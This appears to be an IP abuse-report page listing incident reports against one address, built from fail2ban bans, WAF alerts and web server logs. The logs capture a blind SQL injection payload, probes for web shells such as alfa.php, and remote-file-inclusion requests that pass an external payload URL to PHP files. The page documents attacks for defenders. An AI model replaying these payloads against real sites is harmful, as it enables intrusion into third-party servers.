๐ซ๐ท
CaduVet
2026-06-25 08:37:46
(3 months ago)
2026-06-11 23:59:46,322 fail2ban.actions \[2600\]: NOTICE \[http-auth\] Ban 66.70.140.23
202 ...
show more
2026-06-11 23:59:46,322 fail2ban.actions \[2600\]: NOTICE \[http-auth\] Ban 66.70.140.23
2026-06-12 01:29:12,982 fail2ban.actions \[2600\]: NOTICE \[http-auth\] Ban 66.70.140.23
2026-06-12 03:32:49,284 fail2ban.actions \[2600\]: NOTICE \[http-auth\] Ban 66.70.140.23
...
show less
Brute-Force
๐ฎ๐น
VHosting
2026-06-16 21:50:03
(3 months ago)
Detected WordPress attack from 4 different servers
Brute-Force
Web App Attack
๐ซ๐ท
CaduVet
2026-06-12 01:32:51
(3 months ago)
2026-06-11 23:59:46,322 fail2ban.actions \[2600\]: NOTICE \[http-auth\] Ban 66.70.140.23
202 ...
show more
2026-06-11 23:59:46,322 fail2ban.actions \[2600\]: NOTICE \[http-auth\] Ban 66.70.140.23
2026-06-12 01:29:12,982 fail2ban.actions \[2600\]: NOTICE \[http-auth\] Ban 66.70.140.23
2026-06-12 03:32:49,284 fail2ban.actions \[2600\]: NOTICE \[http-auth\] Ban 66.70.140.23
...
show less
Brute-Force
๐บ๐ธ
TPI-Abuse
2023-12-25 05:58:01
(2 years ago)
(mod_security) mod_security (id:211540) triggered by 66.70.140.23 (ip23.ip-66-70-140.net): 1 in the ...
show more
(mod_security) mod_security (id:211540) triggered by 66.70.140.23 (ip23.ip-66-70-140.net): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Dec 25 00:57:56.899542 2023] [security2:error] [pid 6855] [client 66.70.140.23:57883] [client 66.70.140.23] ModSecurity: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||marinestorage.com|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /wp-json/oembed/1.0/embed?url=1%20waitfor%20delay%20'0:0:15'%20--%20"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] [hostname "marinestorage.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "ZYkZ5HrbP37u6HMrtk9a8gAAAAg"], referer: https://marinestorage.com/
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ต๐น
WebDig
2022-05-10 07:23:18
(4 years ago)
IM360 WAF: Malicious input||File:/wp-content/plugins/wpconfig.bak.php?act=sf||T:APACHE|| and IM360 W ...
show more
IM360 WAF: Malicious input||File:/wp-content/plugins/wpconfig.bak.php?act=sf||T:APACHE|| and IM360 WAF: Malicious file name in the URI||T:APACHE||
show less
Hacking
Brute-Force
๐ง๐ท
AC - Team
2022-05-09 11:27:01
(4 years ago)
66.70.140.23 - - [09/May/2022:12:27:00 -0300] "GET /alfa.php HTTP/1.1" 404 549 "anonymousfox.co" "Mo ...
show more
66.70.140.23 - - [09/May/2022:12:27:00 -0300] "GET /alfa.php HTTP/1.1" 404 549 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
...
show less
Exploited Host
Web App Attack
๐ซ๐ท
I.Hate.Spam
2022-05-09 07:58:43
(4 years ago)
Website hacking attempt: Improper php file access [php file]
Hacking
๐ง๐ท
AC - Team
2022-05-09 05:20:38
(4 years ago)
66.70.140.23 - - [09/May/2022:06:20:35 -0300] "GET /alfa.php HTTP/2.0" 404 10863 "anonymousfox.co" " ...
show more
66.70.140.23 - - [09/May/2022:06:20:35 -0300] "GET /alfa.php HTTP/2.0" 404 10863 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
...
show less
Exploited Host
Web App Attack
๐ง๐ท
AC - Team
2022-05-09 00:17:05
(4 years ago)
66.70.140.23 - - [09/May/2022:01:17:07 -0300] "GET /alfa.php HTTP/1.1" 404 25728 "anonymousfox.co" " ...
show more
66.70.140.23 - - [09/May/2022:01:17:07 -0300] "GET /alfa.php HTTP/1.1" 404 25728 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
...
show less
Exploited Host
Web App Attack
๐ฌ๐ง
findlab
2022-05-08 18:53:01
(4 years ago)
Backdrop CMS module - Spam referrer: anonymousfox.co
Bad Web Bot
Web App Attack
๐บ๐ธ
Major Hostility
2022-05-08 06:43:19
(4 years ago)
"GET /style.php HTTP/1.1" 404
"GET /moduless.php HTTP/1.1" 404
"GET /wp-content/plugins/t_file_wp/t_ ...
show more
"GET /style.php HTTP/1.1" 404
"GET /moduless.php HTTP/1.1" 404
"GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404
"GET /admin.php HTTP/1.1" 404
"GET /boom.php?x HTTP/1.1" 404
"GET /wp-content/plugins/backup_index.php HTTP/1.1" 404
"GET /wp-content/db_cache.php HTTP/1.1" 404
"GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404
"GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404
"GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404
"GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404
"GET /th3_err0r.php?php=https://raw.githubus
show less
Web App Attack
๐ง๐ท
AC - Team
2022-05-07 19:00:47
(4 years ago)
66.70.140.23 - - [07/May/2022:20:00:46 -0300] "GET /alfa.php HTTP/1.1" 301 584 "anonymousfox.co" "Mo ...
show more
66.70.140.23 - - [07/May/2022:20:00:46 -0300] "GET /alfa.php HTTP/1.1" 301 584 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
...
show less
Exploited Host
Web App Attack
๐บ๐ธ
Database.red
2022-05-06 16:08:31
(4 years ago)
[2022-05-06 16:08:31] Exploit probing - /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello
Hacking
Brute-Force
Web App Attack
๐ง๐ท
AC - Team
2022-05-06 06:50:22
(4 years ago)
66.70.140.23 - - [06/May/2022:07:50:22 -0300] "GET /alfa.php HTTP/1.1" 404 549 "anonymousfox.co" "Mo ...
show more
66.70.140.23 - - [06/May/2022:07:50:22 -0300] "GET /alfa.php HTTP/1.1" 404 549 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
...
show less
Exploited Host
Web App Attack
๐ง๐ท
AC - Team
2022-05-05 02:10:33
(4 years ago)
66.70.140.23 - - [05/May/2022:03:10:33 -0300] "GET /alfa.php HTTP/1.1" 404 751 "anonymousfox.co" "Mo ...
show more
66.70.140.23 - - [05/May/2022:03:10:33 -0300] "GET /alfa.php HTTP/1.1" 404 751 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
...
show less
Exploited Host
Web App Attack